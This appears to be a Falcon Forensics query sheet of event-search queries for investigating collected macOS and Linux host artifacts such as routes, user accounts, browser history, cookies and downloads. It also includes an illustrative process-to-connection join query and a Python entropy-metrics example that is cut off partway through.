| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, TargetFileName, UserName, QuaratineFlagsString, QuarantineAgentName, QuarantineEventIdentifier], limit=max)

RouteIP4

Show all Fields

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

IPv4 remote connections

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* RemoteAddressIP4!="0.0.0.0" AND RemoteAddressIP4!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

RouteIP6

Show all Fields

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

IPv6 remote connections

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* RemoteAddressIP6!="0.0.0.0" AND RemoteAddressIP6!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

SignInfo

Show All Fields

#event_simpleName=SignInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, ImageFileName, TargetFileName, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)

Show Fields Matching ImageFileName

#event_simpleName=SignInfo ForensicsCollectionIdentifier=* ImageFileName=PATH | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, ImageFileName, TargetFileName, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)
Note: PATH can be replaced with a glob path, such as /usr/libexec/*.

SpotlightSearchEntry

Show all fields

#event_simpleName=SpotlightSearchEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | UrlLastAccessedTimeStamp := parseTimeStamp(field=UrlLastAccessedTimeStamp, format=seconds) | UrlLastAccessedTimeStamp := formatTime("%F %T", field=UrlLastAccessedTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, SourceFileName, UserName, SpotlightSearchKey, SpotlightResourceName, UrlLastAccessedTimeStamp, Url], limit=max)

SystemExtension

Show all Fields

#event_simpleName=SystemExtension ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, SystemExtensionName, MacBundleVersion, ExtensionIsLoaded,TargetFileName], limit=max)

Show if a specific system extension is loaded

#event_simpleName=SystemExtension ForensicsCollectionIdentifier=* SystemExtensionName= <extension of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, SystemExtensionName, MacBundleVersion, ExtensionIsLoaded,TargetFileName], limit=max)

Show only loaded system extensions

#event_simpleName=SystemExtension ForensicsCollectionIdentifier=* ExtensionIsLoaded=true | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, SystemExtensionName, MacBundleVersion, ExtensionIsLoaded,TargetFileName], limit=max)

TerminalSavedStateInfo

Show all fields

#event_simpleName=TerminalSavedStateInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, TerminalWindowTitle, TerminalTabWorkingDirectoryUrl, TerminalDataBlockIndex, SourceFileName, TerminalWindowId, Line, ForensicsText], limit=max)

UserAccount

Show all Fields

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([time, aid, ForensicsCollectionIdentifier,UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show all fields for UserAccountDeleted

#event_simpleName=UserAccountDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, UID, UserRealName], limit=max)

Show users with root GID

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* GID=0 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([PasswordLastSet, aid, ForensicsCollectionIdentifier, UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show users with admin level privileges

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* UserIsAdmin=1 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([PasswordLastSet, aid, ForensicsCollectionIdentifier, UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

YARA

Show all fields for FfcBytePatternScanResult

#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcScanId, FfcScanType, FfcScanResult, FfcScanRuleName, ImageFileName, TargetFileName, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

Falcon Forensics Query Sheet for Linux

Example queries to be used in advanced event search to investigate ingested Forensics data from Linux hosts.

Tips for searches

Improve the efficiency and effectiveness of your Falcon Forensics searches by scoping on ForensicsCollectionIdentifier or AID to limit the amount of data, using joins efficiently, and taking advantage of grouping functions. You can also apply case-sensitivity options for more precise results.

When searching, use ForensicsCollectionIdentifier or AID to reduce the search time. Falcon Forensics can create many events, which can take a long time to parse through; filtering on a Collection ID or AID narrows the data set up front. This recommendation doesn't apply, of course, if you're searching environment-wide. If you're looking for a specific file, try the FileInfo event.

Regarding FfcFileIdentifier: this value is only useful within a specific collection, because it is built from the filesystem's UUID and the file's inode number, so the same file has a different FfcFileIdentifier on different machines. Use it to tie events together from a single collection: many events carry this field, whereas far fewer carry something like the SHA256 hash.

Joins can be resource-intensive, so limit the amount of data they operate on by filtering on ForensicsCollectionIdentifier or AID. You can do a join without these filters, but the searches may take longer and may be limited. If you're searching for a commonality across your environment, any filtering criteria will do; just don't rely on FfcFileIdentifier to find matches across hosts, because it is unique to each system. You can use joins in any searches that share common fields.

In the searches on this page, you'll notice many groupBy statements; these are among the best ways to group values together. For example, if you're looking for a specific hash, group by SHA256HashData while collecting the other important fields. This gathers all of the resulting data into one table.

These examples show how case sensitivity works in searches:
  • HostName=Test only matches hosts named "Test"
  • HostName=/test/i matches test, Test, TeSt, or any similar combination
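The following query is an added illustration, not one of the queries from the CrowdStrike query sheet. It puts the tips above together on the process and network events listed on this page: it scopes both sides to one collection, joins NetworkConnectIP4 events to ProcessRollup2 on the RawProcessId field that both event types carry, so each connection is shown with the image name and command line of the process that opened it, applies a case-insensitive regex filter, and groups the result. `<collectionid>` and `<pattern of interest>` are placeholders to fill in; the join(), groupBy(), count() and collect() argument names are assumed from the LogScale (CrowdStrike Query Language) function reference and are not from this page, so check them against your Falcon version.

```cql
// Added example: correlate outbound IPv4 connections with the process that made them,
// inside a single collection (<collectionid> is a placeholder).
#event_simpleName=NetworkConnectIP4 ForensicsCollectionIdentifier=<collectionid>
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
// Pull ImageFileName and CommandLine from the ProcessRollup2 rows of the same collection,
// matching on the shared RawProcessId field (join argument names assumed, not from the page).
| join({#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=<collectionid>}, field=RawProcessId, key=RawProcessId, include=[ImageFileName, CommandLine])
// Case-insensitive match on the process image, in the same style as HostName=/test/i above.
| ImageFileName=/<pattern of interest>/i
// One row per process image and remote endpoint, with the connection count and the command lines and times seen.
| groupBy([ImageFileName, RemoteAddressIP4, RemotePort], function=[count(as=connections), collect([CommandLine, time])])
```

Scoping the subquery inside join() to the same ForensicsCollectionIdentifier is what keeps the join cheap; without it the subquery scans ProcessRollup2 across the whole environment. If you need the individual connection events rather than the aggregate, drop the groupBy line and end with a table() call like the ones elsewhere on this page.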

System

ForensicsCollectorOnline

Show all Fields

#event_simpleName = ForensicsCollectorOnline ForensicsCollectionIdentifier = * FfcPlatform= FFC_PLATFORM_LINUX | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath, PhysicalAddress, LocalAddressIP4, LocalAddressIP6], limit=max)

ForensicsCollectorOffline

Show all fields

#event_simpleName = ForensicsCollectorOffline ForensicsCollectionIdentifier = * FfcPlatform= FFC_PLATFORM_LINUX | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath], limit=max)

ForensicsCollectorLog

Show all Fields

#event_simpleName = ForensicsCollectorLog ForensicsCollectionIdentifier = * | "Log Text" := rename(FfcCollectorLogText) | Module := rename(FfcModule) | "Log Level" := rename(FfcLogLevel) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, id, "Log Level", Module, "Log Text"])

BrowserAccount

Show all Fields

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

Show browser accounts with common private email domain

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | BrowserAccountEmail=*gmail.com OR BrowserAccountEmail=*hotmail.com OR BrowserAccountEmail=*yahoo.com OR BrowserAccountEmail=*outlook.com OR BrowserAccountEmail=*icloud.com | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

BrowserCookie

Show all Fields

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserName = BROWSERNAME | table([aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieLastAccessed, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with a browser name, such as Firefox or Chrome. The BrowserName filter can also be used in other queries to filter by browser.

Show cookies from a specific site

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserCookieHost = <site of interest> | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)
Note: Replace <site of interest> with the site name. You can use wildcards such as "*google.com".

BrowserDownloadStart

Show all Fields

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with a browser name, such as Firefox or Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = <site of interest> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace <site of interest> with the site name. You can use wildcards such as "*google.com".

Show abnormally large files

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Replace <fill in bytes here> with the number of bytes you're looking for.

BrowserDownloadEnd

Show all Fields

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with a browser name, such as Firefox or Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = <site of interest> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace <site of interest> with the site name. You can use wildcards such as "*google.com".

Show abnormally large files

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace <fill in bytes here> with the number of bytes you're looking for.

BrowserExtensionInfo

Show all Fields

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with the browser name, such as Firefox or Chrome.

Show if extension of interest is installed

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserExtensionName = <Extension Name> | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

BrowserHistoryVisit

Show all Fields

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Title, BrowserVisitCount, BrowserUrlTypedCount, BrowserVisitType, Id, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastModifiedTimeStamp], limit=max)

Show Fields Matching Browser

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastModifiedTimeStamp, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with the browser name, such as Firefox or Chrome.

Show sites that were manually navigated to (TYPED)

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserVisitType = TYPED | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastModifiedTimeStamp, SourceFileName, UserName], limit=max)

Show visits to a specific URL

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | lastVisit := formatTime("%F %T", field=ContextTimeStamp) | Url = URL | table([lastVisit, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastModifiedTimeStamp, SourceFileName, UserName], limit=max)
Note: Replace URL with the URL of interest. Wildcards are allowed, for example "*example.com*" for every visit to that domain. The visit time must be derived from ContextTimeStamp as above; formatTime() without a field argument formats the ingest timestamp, not the visit.

BrowserHistoryClearInfo

Show all Fields

#event_simpleName = BrowserHistoryClearInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserClearedDataPeriodBasic, BrowserClearedDataPeriodAdvanced, BrowserClearedDataCookiesBasic, BrowserClearedDataCookiesAdvanced, BrowserClearedFormData, BrowserClearedHostedAppsData, BrowserClearedPasswords, BrowserClearedSiteSettings, SourceFileName, UserName], limit=max)

Show if users' browser data was reset for "All Time"

#event_simpleName = BrowserHistoryClearInfo ForensicsCollectionIdentifier = * | BrowserClearedDataPeriodBasic=-1 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserClearedDataPeriodBasic, BrowserClearedDataPeriodAdvanced, BrowserClearedDataCookiesBasic, BrowserClearedDataCookiesAdvanced, BrowserClearedFormData, BrowserClearedHostedAppsData, BrowserClearedPasswords, BrowserClearedSiteSettings, SourceFileName, UserName], limit=max)

BrowserProxy

Show all Fields

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

Show manually set proxy settings

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserProxyType = MANUAL_PROXY | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

CreateSocket

Show all Fields

#event_simpleName=CreateSocket ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, AddressFamily, RawProcessId, SocketType, Protocol], limit=max)

Entropy

Show all fields for EntropyScan

#event_simpleName=EntropyScan ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FileIdentifier, BytesScanned, ShannonEntropy, AverageWordLength, AverageLineLength, MaxLineLength, WhitespaceRatio, SpecialCharactersRatio], limit=max)
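The EntropyScan metrics are easiest to read against known content. The Python below is an added example, not CrowdStrike code or the sensor's implementation: it recomputes metrics with the same names as the EntropyScan fields over two constructed samples (a short shell script and a deterministic high-entropy blob standing in for packed or encrypted content) and applies a simple triage threshold. The formulas, the 7.0 bits-per-byte threshold and the samples are this example's assumptions.

```python
import math
import string


def entropy_scan(data: bytes) -> dict:
    """Return EntropyScan-style metrics for one file's content.

    Field names mirror the EntropyScan event; the formulas are this example's
    own (assumed), not CrowdStrike's.
    """
    n = len(data)
    if n == 0:
        return {"BytesScanned": 0, "ShannonEntropy": 0.0, "AverageWordLength": 0.0,
                "AverageLineLength": 0.0, "MaxLineLength": 0, "WhitespaceRatio": 0.0,
                "SpecialCharactersRatio": 0.0}

    # Shannon entropy in bits per byte: 0 for a constant file, 8 for uniform bytes.
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    entropy = -sum((c / n) * math.log2(c / n) for c in counts if c)

    # latin-1 maps every byte to exactly one character, so the text metrics
    # never fail on binary input.
    text = data.decode("latin-1")
    lines = text.split("\n")
    words = text.split()
    whitespace = sum(ch in string.whitespace for ch in text)
    special = sum((not ch.isalnum()) and ch not in string.whitespace for ch in text)

    return {
        "BytesScanned": n,
        "ShannonEntropy": round(entropy, 3),
        "AverageWordLength": round(sum(map(len, words)) / len(words), 2) if words else 0.0,
        "AverageLineLength": round(sum(map(len, lines)) / len(lines), 2),
        "MaxLineLength": max(map(len, lines)),
        "WhitespaceRatio": round(whitespace / n, 3),
        "SpecialCharactersRatio": round(special / n, 3),
    }


def looks_packed_or_encrypted(metrics: dict, threshold: float = 7.0) -> bool:
    """Triage rule: a file in a text-only location (cron, rc.*, shell config)
    scoring near 8 bits/byte is worth pulling. The threshold is a tuning assumption."""
    return metrics["ShannonEntropy"] >= threshold


# Constructed samples, not collected files.
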